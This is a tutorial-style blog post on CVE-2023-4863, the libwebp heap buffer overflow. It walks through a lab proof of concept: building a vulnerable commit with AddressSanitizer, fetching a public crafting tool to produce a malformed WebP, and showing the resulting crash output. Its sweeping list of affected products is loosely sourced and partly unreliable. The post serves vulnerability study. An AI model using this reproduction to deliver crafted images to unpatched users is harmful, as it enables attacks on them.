Heap Buffer Overflow in libwebp in Google Chrome - CVE-2023-4863

Image Source: https://www.helpnetsecurity.com/2023/09/12/cve-2023-4863/

Use what I'm about to say in this article only for the right purposes, such as raising security awareness and improving the security posture of your environments. I do not accept any responsibility for other uses.

WebP is an open-source image format developed by Google. WebP enables higher quality images in smaller file sizes. The libwebp package, released by Google, encodes and decodes images in WebP format and is used widely across the internet for lossless image compression.

The image parsing library libwebp is the core of the recently identified CVE-2023-4863 heap buffer overflow vulnerability and zero-day exploit that impacts Google Chrome and other Chromium-based browsers for Windows, macOS, and Linux, as well as any software or web application that uses the libwebp library. (Source:https://www.upguard.com/blog/libwebp-cve-2023)

Image Source: https://www.oligo.security/blog/critical-vulnerability-in-webp-libwebp-cve-2023-4863

In Google Chrome, versions before 116.0.5845.187 and libwebp 1.3.2 are affected by these vulnerabilities. Chromium security severity is Critical.

Since many applications use the webp library, many applications are affected by this vulnerability and the CVSS score is 8.8. Here are some apps that may be affected.

Category	Products
Web Browsers	Google Chrome, Safari, Microsoft Edge, Mozilla Firefox, Tor, Beaker (web browser), GNOME Web, Midori, OhHai Browser, Pale Moon, SEOBrowse
Social Media	Discord, Facebook, Instagram, Linked, Pinterest, Reddit, Telegram, Twitter, WhatsApp,
Video Platforms	Lbry, Twitch, Vimeo, YouTube, YTMDesktop App
Cloud Storage	Amazon Photos, Dropbox, Google Drive, Google Photos
Ecommerce	Amazon, Ebay, Etsy, Shopify, WooCommerce
CMS	Drupal, Joomla, MediaWiki, WordPress
Email Services	Gmail
Forum Software	PHPBB, vBulletin, XenForo
Photo Editing	GDAL, GIMP, Graphic Converter, ImageMagick, Paint.NET, Photoshop, Photoshop and Picasa, Pixelmator, XnView
Game Engines	Godot Engine, Unreal Engine, Unity
Desktop Software	1Password, Basecamp 3, Bitwarden, Blender, Cryptocat (discontinued), Discord, Discord RPC Maker, Electron App Store (Unofficial), Etcher,
Web Servers	Apache, IIS, nginx
Major Companies	Facebook, Google, Slack, Wikimedia, WordPress.com

(List source: https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html)

So let's perform the POC of this vulnerability.

Let's download the libwebp library from Google source.

git clone https://chromium.googlesource.com/webm/libwebp/ webp_test

Let's go to the webp_test folder.

cd webp_test

Then, let's move on to the relevant commit.

git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0

Let's enable AddressSanitizer (ASan). This tool helps detect address corruption errors in C and C++ programs.

sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix

Let's compile the makefile.unix file.

make -f makefile.unix

At this point you may encounter errors that some files are missing. I will show what I encountered in words and share the commands that will solve it.

Let's install libjpeg-dev.

sudo apt-get install libjpeg-dev

Then install libpng-dev

sudo apt-get install libpng-dev

Install the libtiff-dev.

sudo apt-get install libtiff-dev

Then, compile the makefile.unix file again.

make -f makefile.unix

Then, go to the examples folder.

cd examples/

Let's download the C source code named craft.c.

wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c

Let's compile the C source code named craft.c. As a result of the compiled code, it will give us an output file named craft.

gcc -o craft craft.c

Let's give the bad.webp image as input to the craft file.

./craft bad.webp

Then let's run our last command.

./dwebp bad.webp -o test.png

Heap buffer overflow occurs exactly at this stage.

The output shows us that the dwebp program encountered a heap buffer overflow. This means that the program is trying to write data to a memory location that it is not allowed to access. Our AddressSanitizer (ASan) debugger tool worked as we expected and informed us that heap buffer overflow had occurred. The error occurs in the BuildHuffmanTable function, which is part of the WebP library.

As we see in the error description, it occurs in the memory area at 0x626000002f28.

==78508==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x5589e8fad35a bp 0x7fff95d4c400 sp 0x7fff95d4c3f0

In the section below, we see the function that triggered the error. That is, the BuildHuffmanTable function. ​

#0 0x5589e8fad359 in BuildHuffmanTable (/home/ali/webp_test/examples/dwebp+0xb6359)

AddressSanitizer uses Shadow Bytes when doing this debugging. Shadow Bytes can basically be thought of as a copy of the real memory, and when an error occurs, AddressSanitizer works on shadow bytes and carries information about the values of the relevant address blocks in memory at the time the error occurred.

Shadow bytes around the buggy address:
  0x0c4c7fff8590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4c7fff85a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4c7fff85b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4c7fff85c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4c7fff85d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4c7fff85e0: 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff8600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff8610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff8620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

Sources

->https://github.com/bbaranoff/CVE-2023-4863 ->https://github.com/mistymntncop/CVE-2023-4863/blob/main/bad.webp ->https://www.upguard.com/blog/libwebp-cve-2023 ->https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html